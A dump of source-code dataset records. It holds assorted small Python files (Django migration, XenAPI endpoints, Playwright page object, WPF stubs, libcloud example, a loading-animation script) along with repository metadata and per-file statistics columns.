"MIT"
] | null | null | null | GeometricOpticsPy/OpticalSystem.py | NicoDeshler/GeometricOpticsPy | b808a506596fa532026c0f22e734dd66ed8c2b12 | [
"MIT"
] | null | null | null | GeometricOpticsPy/OpticalSystem.py | NicoDeshler/GeometricOpticsPy | b808a506596fa532026c0f22e734dd66ed8c2b12 | [
"MIT"
] | null | null | null | class OpticalSystem():
# A class that describes and optical system.
# Assumptions
# A system is composed of optical Surface placed at desired separations along the optical axis
# A | 39.2 | 98 | 0.729592 | 26 | 196 | 5.5 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.229592 | 196 | 5 | 99 | 39.2 | 0.94702 | 0.760204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4f915f1b509994c7dee62e440312997e1daee417 | 1,803 | py | Python | irco-server/ircoapp/migrations/0001_initial.py | go-team-13/IRCO | fc57b69f11eebb6a6f448798581783e0ed525d86 | [
"MIT"
] | null | null | null | irco-server/ircoapp/migrations/0001_initial.py | go-team-13/IRCO | fc57b69f11eebb6a6f448798581783e0ed525d86 | [
"MIT"
] | null | null | null | irco-server/ircoapp/migrations/0001_initial.py | go-team-13/IRCO | fc57b69f11eebb6a6f448798581783e0ed525d86 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.5 on 2019-01-12 22:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Program',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('description', models.CharField(max_length=200)),
('schedule', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='Site',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('location', models.CharField(max_length=200)),
('lat', models.DecimalField(decimal_places=5, max_digits=10)),
('lon', models.DecimalField(decimal_places=5, max_digits=10)),
('locphone', models.CharField(max_length=200)),
('manager', models.CharField(max_length=200)),
('mgrphone1', models.CharField(max_length=200)),
('mgremail', models.CharField(max_length=200)),
('principal', models.CharField(max_length=200)),
('prncphone', models.CharField(max_length=200)),
('prncemail', models.CharField(max_length=200)),
],
),
migrations.AddField(
model_name='program',
name='site',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ircoapp.Site'),
),
]
| 38.361702 | 114 | 0.570161 | 179 | 1,803 | 5.608939 | 0.374302 | 0.179283 | 0.215139 | 0.286853 | 0.593626 | 0.378486 | 0.304781 | 0.304781 | 0.219124 | 0.219124 | 0 | 0.045277 | 0.289517 | 1,803 | 46 | 115 | 39.195652 | 0.738486 | 0.024958 | 0 | 0.333333 | 1 | 0 | 0.080866 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.051282 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4f9f9223cf5bfe4a7ed7706b97240d3f1466f61e | 506 | py | Python | services/web/server/src/simcore_service_webserver/version_control_tags.py | elisabettai/osparc-simcore | ad7b6e05111b50fe95e49306a992170490a7247f | [
"MIT"
] | null | null | null | services/web/server/src/simcore_service_webserver/version_control_tags.py | elisabettai/osparc-simcore | ad7b6e05111b50fe95e49306a992170490a7247f | [
"MIT"
] | 1 | 2021-11-29T13:38:09.000Z | 2021-11-29T13:38:09.000Z | services/web/server/src/simcore_service_webserver/version_control_tags.py | mrnicegyu11/osparc-simcore | b6fa6c245dbfbc18cc74a387111a52de9b05d1f4 | [
"MIT"
] | null | null | null | import re
from typing import Optional
from models_library.basic_regex import UUID_RE
from models_library.projects import ProjectID
def compose_workcopy_project_tag_name(workcopy_project_id: ProjectID) -> str:
return f"project:{workcopy_project_id}"
def parse_workcopy_project_tag_name(name: str) -> Optional[ProjectID]:
if m := re.match(rf"^project:(?P<workcopy_project_id>{UUID_RE})$", name):
data = m.groupdict()
return ProjectID(data["workcopy_project_id"])
return None
| 29.764706 | 77 | 0.76087 | 71 | 506 | 5.126761 | 0.43662 | 0.247253 | 0.186813 | 0.120879 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140316 | 506 | 16 | 78 | 31.625 | 0.836782 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 0.144269 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.363636 | 0.090909 | 0.818182 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
96ce81643768174ce8b46a62102fbeab46e70afd | 226 | py | Python | python-questions-for-pratices/Question-59.py | siddharth-143/Python | 293f4643a3a13e3b82d23fd8922db54dbb0f12bc | [
"MIT"
] | null | null | null | python-questions-for-pratices/Question-59.py | siddharth-143/Python | 293f4643a3a13e3b82d23fd8922db54dbb0f12bc | [
"MIT"
] | null | null | null | python-questions-for-pratices/Question-59.py | siddharth-143/Python | 293f4643a3a13e3b82d23fd8922db54dbb0f12bc | [
"MIT"
] | null | null | null | """
Question 59 :
Print a unicode string "hello world".
Hints : Use u'string format to define unicode string
"""
# Solution :
unicode_string = u"hello world!"
print(unicode_string)
"""
Output :
hello world
""" | 14.125 | 56 | 0.659292 | 29 | 226 | 5.068966 | 0.551724 | 0.353742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.221239 | 226 | 16 | 57 | 14.125 | 0.823864 | 0.553097 | 0 | 0 | 0 | 0 | 0.196721 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
96d80597e5c02947d02d204bfc1daa1f894484a4 | 829 | py | Python | pages/article_page/article_page.py | savvagen/playwright-pytest-example | acf4e89d0a7dcc1b71b1eb012366b1393f515b41 | [
"Apache-2.0"
] | 19 | 2020-11-15T16:37:51.000Z | 2022-03-23T02:41:38.000Z | pages/article_page/article_page.py | cjydayang/playwright-pytest-example | acf4e89d0a7dcc1b71b1eb012366b1393f515b41 | [
"Apache-2.0"
] | 2 | 2021-01-03T21:38:37.000Z | 2021-01-27T08:32:00.000Z | pages/article_page/article_page.py | cjydayang/playwright-pytest-example | acf4e89d0a7dcc1b71b1eb012366b1393f515b41 | [
"Apache-2.0"
] | 8 | 2020-11-05T23:27:37.000Z | 2022-03-16T08:07:00.000Z | import allure
from pages.web_page import WebPage
from pages.web_elements import *
class ArticlePage(WebPage):
def title(self): return el(self.page, selector='.container > h1')
def author_link(self): return el(self.page, selector='.author')
def subject(self): return el(self.page, selector='div[class*="article-content"] h1')
def publish_button(self): return el(self.page, selector='text="Publish Article"')
def tags_field(self): return el(self.page, selector='input[placeholder="Enter tags"]')
def __init__(self, base_url, article_id, page: Page):
super().__init__(page)
self.base_url = base_url
self.article_id = article_id
@allure.step
def open(self):
self.page.goto("%s/#/article/%s" % self.base_url, self.article_id, wait_until="load")
return self
| 36.043478 | 93 | 0.689988 | 118 | 829 | 4.661017 | 0.372881 | 0.087273 | 0.109091 | 0.145455 | 0.327273 | 0.254545 | 0 | 0 | 0 | 0 | 0 | 0.002911 | 0.171291 | 829 | 22 | 94 | 37.681818 | 0.797671 | 0 | 0 | 0 | 0 | 0 | 0.15199 | 0.063932 | 0 | 0 | 0 | 0 | 0 | 1 | 0.411765 | false | 0 | 0.176471 | 0.294118 | 0.705882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
96daef619ffbbeaf04e9f747d8fa517872f43cef | 268 | py | Python | tests/test_models.py | gilmrjc/djangopress | 8e81e1477661b28a65b6d2ea5cccbf299219734b | [
"MIT"
] | null | null | null | tests/test_models.py | gilmrjc/djangopress | 8e81e1477661b28a65b6d2ea5cccbf299219734b | [
"MIT"
] | null | null | null | tests/test_models.py | gilmrjc/djangopress | 8e81e1477661b28a65b6d2ea5cccbf299219734b | [
"MIT"
] | null | null | null | """Test for djangopress.core.models."""
from model_mommy import mommy
from djangopress.core.models import Option
def test_option_str():
"""Test string representation for Option object."""
option = mommy.prepare(Option)
assert str(option) == option.name
| 24.363636 | 55 | 0.735075 | 35 | 268 | 5.542857 | 0.514286 | 0.154639 | 0.216495 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152985 | 268 | 10 | 56 | 26.8 | 0.854626 | 0.294776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
96e34a3d56486d6a01c5f875f8afeef7eca56d01 | 2,383 | py | Python | API/v1/VBD/plug.py | MisakaMikoto0502/XenXenXenSe | 58a4d288dd2ef3f09ee0062b542b50f0b11d1c43 | [
"MIT"
] | null | null | null | API/v1/VBD/plug.py | MisakaMikoto0502/XenXenXenSe | 58a4d288dd2ef3f09ee0062b542b50f0b11d1c43 | [
"MIT"
] | null | null | null | API/v1/VBD/plug.py | MisakaMikoto0502/XenXenXenSe | 58a4d288dd2ef3f09ee0062b542b50f0b11d1c43 | [
"MIT"
] | null | null | null | from http.client import RemoteDisconnected
from xmlrpc.client import Fault
from fastapi import APIRouter, HTTPException
from XenAPI.XenAPI import Failure
from XenGarden.session import create_session
from XenGarden.VBD import VBD
from API.v1.Common import xenapi_failure_jsonify
from app.settings import Settings
router = APIRouter()
@router.get("/{cluster_id}/vbd/{vbd_uuid}/plug")
@router.post("/{cluster_id}/vbd/{vbd_uuid}/plug")
async def _vbd_plug(cluster_id: str, vbd_uuid: str):
"""Plug VBD into VM"""
try:
session = create_session(
_id=cluster_id, get_xen_clusters=Settings.get_xen_clusters()
)
vbd: VBD = VBD.get_by_uuid(session=session, uuid=vbd_uuid)
if vbd is not None:
ret = dict(success=vbd.plug())
else:
ret = dict(success=False)
session.xenapi.session.logout()
return ret
except Failure as xenapi_error:
raise HTTPException(
status_code=500, detail=xenapi_failure_jsonify(xenapi_error)
)
except Fault as xml_rpc_error:
raise HTTPException(
status_code=int(xml_rpc_error.faultCode),
detail=xml_rpc_error.faultString,
)
except RemoteDisconnected as rd_error:
raise HTTPException(status_code=500, detail=rd_error.strerror)
@router.delete("/{cluster_id}/vbd/{vbd_uuid}/plug")
@router.get("/{cluster_id}/vbd/{vbd_uuid}/unplug")
@router.post("/{cluster_id}/vbd/{vbd_uuid}/unplug")
async def vbd_unplug(cluster_id: str, vbd_uuid: str):
"""Unplug from VBD"""
try:
session = create_session(
_id=cluster_id, get_xen_clusters=Settings.get_xen_clusters()
)
vbd: VBD = VBD.get_by_uuid(session=session, uuid=vbd_uuid)
if vbd is not None:
ret = dict(success=vbd.unplug())
else:
ret = dict(success=False)
session.xenapi.session.logout()
return ret
except Failure as xenapi_error:
raise HTTPException(
status_code=500, detail=xenapi_failure_jsonify(xenapi_error)
)
except Fault as xml_rpc_error:
raise HTTPException(
status_code=int(xml_rpc_error.faultCode),
detail=xml_rpc_error.faultString,
)
except RemoteDisconnected as rd_error:
raise HTTPException(status_code=500, detail=rd_error.strerror)
| 31.773333 | 72 | 0.671842 | 305 | 2,383 | 5.019672 | 0.216393 | 0.052907 | 0.090137 | 0.113651 | 0.763553 | 0.763553 | 0.724363 | 0.632266 | 0.632266 | 0.632266 | 0 | 0.0071 | 0.231641 | 2,383 | 74 | 73 | 32.202703 | 0.829055 | 0 | 0 | 0.6 | 0 | 0 | 0.072222 | 0.072222 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
96e734dc92c9bfe30c09882b5278257f306984ef | 716 | py | Python | custom/api/utils.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 471 | 2015-01-10T02:55:01.000Z | 2022-03-29T18:07:18.000Z | custom/api/utils.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 14,354 | 2015-01-01T07:38:23.000Z | 2022-03-31T20:55:14.000Z | custom/api/utils.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 175 | 2015-01-06T07:16:47.000Z | 2022-03-29T13:27:01.000Z | from requests.auth import HTTPBasicAuth
def apply_updates(doc, update_dict):
# updates the doc with items from the dict
# returns whether or not any updates were made
should_save = False
for key, value in update_dict.items():
if getattr(doc, key, None) != value:
setattr(doc, key, value)
should_save = True
return should_save
class EndpointMixin(object):
@classmethod
def from_config(cls, config):
return cls(config.url, config.username, config.password)
def _auth(self):
return HTTPBasicAuth(self.username, self.password)
def _urlcombine(self, base, target):
return '{base}{target}'.format(base=base, target=target)
| 27.538462 | 64 | 0.674581 | 92 | 716 | 5.152174 | 0.521739 | 0.063291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234637 | 716 | 25 | 65 | 28.64 | 0.864964 | 0.118715 | 0 | 0 | 0 | 0 | 0.022293 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.125 | 0.0625 | 0.1875 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 3 |
8c044ba4cf510c73d6cccb54a1d049a9d637e71a | 122 | py | Python | tasksapi/apps.py | mwiens91/saltant | 9e72175a896f5859ada304ad3ae4d84dfc3834db | [
"MIT"
] | 3 | 2018-12-08T01:18:29.000Z | 2018-12-14T23:18:42.000Z | tasksapi/apps.py | saltant-org/saltant | db498a1186fc74221f8214ad1819dd03bf4b08ac | [
"MIT"
] | 3 | 2019-05-23T07:43:13.000Z | 2021-06-10T20:46:53.000Z | tasksapi/apps.py | saltant-org/saltant | db498a1186fc74221f8214ad1819dd03bf4b08ac | [
"MIT"
] | 2 | 2019-03-13T22:31:09.000Z | 2019-05-03T00:18:30.000Z | from django.apps import AppConfig
class TasksApiConfig(AppConfig):
name = "tasksapi"
verbose_name = "tasks API"
| 17.428571 | 33 | 0.729508 | 14 | 122 | 6.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188525 | 122 | 6 | 34 | 20.333333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0.139344 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
8c46b68d6cc2ad4e26c12b0a79dd32ab487a8798 | 253 | py | Python | docs/examples/compute/ec2/temporary_credentials.py | dupontz/libcloud | 419c69441ea10e7bbf37319e5e8d02e82e7e6b40 | [
"Apache-2.0"
] | 1,435 | 2015-01-07T05:32:51.000Z | 2022-03-25T19:39:34.000Z | docs/examples/compute/ec2/temporary_credentials.py | dupontz/libcloud | 419c69441ea10e7bbf37319e5e8d02e82e7e6b40 | [
"Apache-2.0"
] | 1,158 | 2015-01-04T18:08:42.000Z | 2022-03-24T14:34:57.000Z | docs/examples/compute/ec2/temporary_credentials.py | dupontz/libcloud | 419c69441ea10e7bbf37319e5e8d02e82e7e6b40 | [
"Apache-2.0"
] | 832 | 2015-01-05T09:20:21.000Z | 2022-03-24T19:22:19.000Z | from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
cls = get_driver(Provider.EC2)
driver = cls('temporary access key', 'temporary secret key',
token='temporary session token', region="us-west-1")
| 36.142857 | 65 | 0.750988 | 34 | 253 | 5.529412 | 0.617647 | 0.12766 | 0.202128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009259 | 0.146245 | 253 | 6 | 66 | 42.166667 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0.284585 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8c471d50f28f4ce276945cd00f4c09e5339f7e4c | 7,272 | py | Python | stubs.min/System/Windows/Interop_parts/HwndSourceParameters.py | ricardyn/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2021-02-02T13:39:16.000Z | 2021-02-02T13:39:16.000Z | stubs.min/System/Windows/Interop_parts/HwndSourceParameters.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/System/Windows/Interop_parts/HwndSourceParameters.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class HwndSourceParameters(object):
"""
Contains the parameters that are used to create an System.Windows.Interop.HwndSource object using the System.Windows.Interop.HwndSource.#ctor(System.Windows.Interop.HwndSourceParameters) constructor.
HwndSourceParameters(name: str)
HwndSourceParameters(name: str,width: int,height: int)
"""
def Equals(self,obj):
"""
Equals(self: HwndSourceParameters,obj: HwndSourceParameters) -> bool
Determines whether this structure is equal to a specified
System.Windows.Interop.HwndSourceParameters structure.
obj: The structure to be tested for equality.
Returns: true if the structures are equal; otherwise,false.
Equals(self: HwndSourceParameters,obj: object) -> bool
Determines whether this structure is equal to a specified object.
obj: The objects to be tested for equality.
Returns: true if the comparison is equal; otherwise,false.
"""
pass
def GetHashCode(self):
"""
GetHashCode(self: HwndSourceParameters) -> int
Returns the hash code for this System.Windows.Interop.HwndSourceParameters
instance.
Returns: A 32-bit signed integer hash code.
"""
pass
def SetPosition(self,x,y):
"""
SetPosition(self: HwndSourceParameters,x: int,y: int)
Sets the values that are used for the screen position of the window for the
System.Windows.Interop.HwndSource.
x: The position of the left edge of the window.
y: The position of the upper edge of the window.
"""
pass
def SetSize(self,width,height):
"""
SetSize(self: HwndSourceParameters,width: int,height: int)
Sets the values that are used for the window size of the
System.Windows.Interop.HwndSource.
width: The width of the window,in device pixels.
height: The height of the window,in device pixels.
"""
pass
def __eq__(self,*args):
""" x.__eq__(y) <==> x==y """
pass
@staticmethod
def __new__(self,name,width=None,height=None):
"""
__new__[HwndSourceParameters]() -> HwndSourceParameters
__new__(cls: type,name: str)
__new__(cls: type,name: str,width: int,height: int)
"""
pass
def __ne__(self,*args):
pass
AcquireHwndFocusInMenuMode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the value that determines whether to acquire Win32 focus for the WPF containing window when an System.Windows.Interop.HwndSource is created.
Get: AcquireHwndFocusInMenuMode(self: HwndSourceParameters) -> bool
Set: AcquireHwndFocusInMenuMode(self: HwndSourceParameters)=value
"""
AdjustSizingForNonClientArea=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value that indicates whether to include the nonclient area for sizing.
Get: AdjustSizingForNonClientArea(self: HwndSourceParameters) -> bool
Set: AdjustSizingForNonClientArea(self: HwndSourceParameters)=value
"""
ExtendedWindowStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the extended Microsoft Windows styles for the window.
Get: ExtendedWindowStyle(self: HwndSourceParameters) -> int
Set: ExtendedWindowStyle(self: HwndSourceParameters)=value
"""
HasAssignedSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates whether a size was assigned.
Get: HasAssignedSize(self: HwndSourceParameters) -> bool
"""
Height=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value that indicates the height of the window.
Get: Height(self: HwndSourceParameters) -> int
Set: Height(self: HwndSourceParameters)=value
"""
HwndSourceHook=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the message hook for the window.
Get: HwndSourceHook(self: HwndSourceParameters) -> HwndSourceHook
Set: HwndSourceHook(self: HwndSourceParameters)=value
"""
ParentWindow=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the window handle (HWND) of the parent for the created window.
Get: ParentWindow(self: HwndSourceParameters) -> IntPtr
Set: ParentWindow(self: HwndSourceParameters)=value
"""
PositionX=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the left-edge position of the window.
Get: PositionX(self: HwndSourceParameters) -> int
Set: PositionX(self: HwndSourceParameters)=value
"""
PositionY=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the upper-edge position of the window.
Get: PositionY(self: HwndSourceParameters) -> int
Set: PositionY(self: HwndSourceParameters)=value
"""
RestoreFocusMode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets how WPF handles restoring focus to the window.
Get: RestoreFocusMode(self: HwndSourceParameters) -> RestoreFocusMode
Set: RestoreFocusMode(self: HwndSourceParameters)=value
"""
TreatAncestorsAsNonClientArea=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: TreatAncestorsAsNonClientArea(self: HwndSourceParameters) -> bool
Set: TreatAncestorsAsNonClientArea(self: HwndSourceParameters)=value
"""
TreatAsInputRoot=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: TreatAsInputRoot(self: HwndSourceParameters) -> bool
Set: TreatAsInputRoot(self: HwndSourceParameters)=value
"""
UsesPerPixelOpacity=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that declares whether the per-pixel opacity of the source window content is respected.
Get: UsesPerPixelOpacity(self: HwndSourceParameters) -> bool
Set: UsesPerPixelOpacity(self: HwndSourceParameters)=value
"""
UsesPerPixelTransparency=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: UsesPerPixelTransparency(self: HwndSourceParameters) -> bool
Set: UsesPerPixelTransparency(self: HwndSourceParameters)=value
"""
Width=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value that indicates the width of the window.
Get: Width(self: HwndSourceParameters) -> int
Set: Width(self: HwndSourceParameters)=value
"""
WindowClassStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the Microsoft Windows class style for the window.
Get: WindowClassStyle(self: HwndSourceParameters) -> int
Set: WindowClassStyle(self: HwndSourceParameters)=value
"""
WindowName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the name of the window.
Get: WindowName(self: HwndSourceParameters) -> str
Set: WindowName(self: HwndSourceParameters)=value
"""
WindowStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the style for the window.
Get: WindowStyle(self: HwndSourceParameters) -> int
Set: WindowStyle(self: HwndSourceParameters)=value
"""
| 34.628571 | 202 | 0.724697 | 856 | 7,272 | 6.123832 | 0.16472 | 0.103014 | 0.061808 | 0.082411 | 0.364365 | 0.306562 | 0.277947 | 0.277947 | 0.277947 | 0.25124 | 0 | 0.000667 | 0.17478 | 7,272 | 209 | 203 | 34.794258 | 0.872855 | 0.236799 | 0 | 0.205882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205882 | false | 0.205882 | 0 | 0 | 0.764706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8c4c36dcf3a36b91253467e951433811ad79e4f5 | 594 | py | Python | tcex/input/models/create_config_model.py | phuerta-tc/tcex | 4a4e800e1a6114c1fde663f8c3ab7a1d58045c79 | [
"Apache-2.0"
] | null | null | null | tcex/input/models/create_config_model.py | phuerta-tc/tcex | 4a4e800e1a6114c1fde663f8c3ab7a1d58045c79 | [
"Apache-2.0"
] | null | null | null | tcex/input/models/create_config_model.py | phuerta-tc/tcex | 4a4e800e1a6114c1fde663f8c3ab7a1d58045c79 | [
"Apache-2.0"
] | null | null | null | """Create Config Model"""
# pylint: disable=no-self-argument,no-self-use
# standard library
from typing import Any, Dict
# third-party
from pydantic import BaseModel, root_validator
class CreateConfigModel(BaseModel):
"""Create Config Model"""
# TODO: [low] workaround for PLAT-4393
@root_validator(pre=True)
def empty_str_to_none(cls, values: Dict[str, Any]):
"""Convert empty strings to None.
Core sends '' for field that are not populated instead of sending a null value.
"""
return {k: v if v != '' else None for k, v in values.items()}
| 28.285714 | 87 | 0.676768 | 84 | 594 | 4.72619 | 0.72619 | 0.060453 | 0.085642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008547 | 0.212121 | 594 | 20 | 88 | 29.7 | 0.839744 | 0.442761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
8c5d9469f1ba60a3fb0da919781f5dd7bbae10c6 | 11,397 | py | Python | tankigen.py | MasterScott/tankigen | 2386fea5acbb16ae14649528a5889cb8a3fef0e9 | [
"MIT"
] | 18 | 2021-03-22T08:41:47.000Z | 2022-02-23T00:32:37.000Z | tankigen.py | MasterScott/tankigen | 2386fea5acbb16ae14649528a5889cb8a3fef0e9 | [
"MIT"
] | 1 | 2021-06-04T01:45:37.000Z | 2021-06-04T01:46:01.000Z | tankigen.py | MasterScott/tankigen | 2386fea5acbb16ae14649528a5889cb8a3fef0e9 | [
"MIT"
] | 8 | 2021-03-23T20:36:53.000Z | 2021-09-21T12:30:08.000Z | #starting function
# importing the necessary packages
import time
import sys
import os
# Function for implementing the loading animation
def load_animation():
# String to be displayed when the application is loading
load_str = "starting tankigen please wait..."
ls_len = len(load_str)
# String for creating the rotating line
animation = "|/-\\"
anicount = 0
# used to keep the track of
# the duration of animation
counttime = 0
# pointer for travelling the loading string
i = 0
while (counttime != 100):
# used to change the animation speed
# smaller the value, faster will be the animation
time.sleep(0.075)
# converting the string to list
# as string is immutable
load_str_list = list(load_str)
# x->obtaining the ASCII code
x = ord(load_str_list[i])
# y->for storing altered ASCII code
y = 0
# if the character is "." or " ", keep it unaltered
# switch uppercase to lowercase and vice-versa
if x != 32 and x != 46:
if x>90:
y = x-32
else:
y = x + 32
load_str_list[i]= chr(y)
# for storing the resultant string
res =''
for j in range(ls_len):
res = res + load_str_list[j]
# displaying the resultant string
sys.stdout.write("\r"+res + animation[anicount])
sys.stdout.flush()
# Assigning loading string
# to the resultant string
load_str = res
anicount = (anicount + 1)% 4
i =(i + 1)% ls_len
counttime = counttime + 1
# for windows OS
if os.name =="nt":
os.system("cls")
# for linux / Mac OS
else:
os.system("clear")
# Driver program
if __name__ == '__main__':
load_animation()
# Your desired code continues from here
import argparse
import base64
import sys
